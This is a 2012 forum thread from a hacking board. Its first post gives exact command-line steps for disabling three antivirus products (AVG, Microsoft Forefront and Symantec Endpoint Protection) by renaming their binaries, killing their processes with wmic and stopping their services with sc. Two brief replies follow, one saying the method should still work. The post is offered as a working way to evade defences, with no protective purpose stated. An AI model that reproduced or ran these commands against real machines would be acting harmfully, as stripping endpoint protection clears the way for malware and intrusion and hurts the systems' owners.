EvilZone

Board: Hacking and Security

Title: Disabling specific AVs: AVG, Microsoft Forefront, Symantec Endpoint Protection
Post by: z3ro, August 06, 2012, 06:30:12 PM


1. AVG


Services running are the AVG watchdog (avgwd), and the AVG IDS agent (avgidsagent). The running processes are as follows: avgidsagent.exe, avgwdsvc.exe, avgemca.exe, avgrsa.exe, avgcsrva.exe, and avgnsa.exe. The watchdog process is very persistent at restarting things, is not killable, and neither is the service stoppable.


Killing it: 1) Rename the binary files in %systemroot%\program files\avg\avg2012\ as follows.


Code:
C:\> cd %systemroot%\program files\avg\avg2012
C:\> move avgcsrva.exe avgcsrva_.exe
C:\> move avgemca.exe avgemca_.exe
C:\> move avgnsa.exe avgnsa_.exe
C:\> move avgrsa.exe avgrsa_.exe


2) Kill the running processes simultaneously with a one line (wildcard powered) wmic command.

>> The watchdog service will try to restart all of the binaries but fail.


2. Microsoft Forefront


The service name is “msmpsvc”, and the running processes are msmpeng.exe, and msseces.exe, one being the engine and the other being the GUI reporting/configuration tool respectively.


DISABLING: kill the GUI tool and stop the A/V engine service.


Code:
C:\> wmic process where name="msseces.exe" delete
C:\> sc stop msmpsvc


3. Symantec Endpoint Protection


The services running are ccEvtMgr, ccSetMgr, smcservice, and “Symantec AntiVirus”. The processes that matter are smc.exe, and smcgui.exe.


DISABLING: kill the processes, and stop the services. I found that the event manager (ccEvtMgr), and settings manager (ccSetMgr) services can remain running without any impact.


Code:
C:\> wmic process where "name like '%smc%.exe'" delete
C:\> sc stop smcservice
C:\> sc stop "Symantec AntiVirus"

Title: Re: Disabling specific AVs: AVG, Microsoft Forefront, Symantec Endpoint Protection
Post by: Stackprotector, August 06, 2012, 11:48:09 PM
Please add some credits :)
Title: Re: Disabling specific AVs: AVG, Microsoft Forefront, Symantec Endpoint Protection
Post by: Ghastly, August 10, 2012, 03:47:32 AM
Bit old but should still work.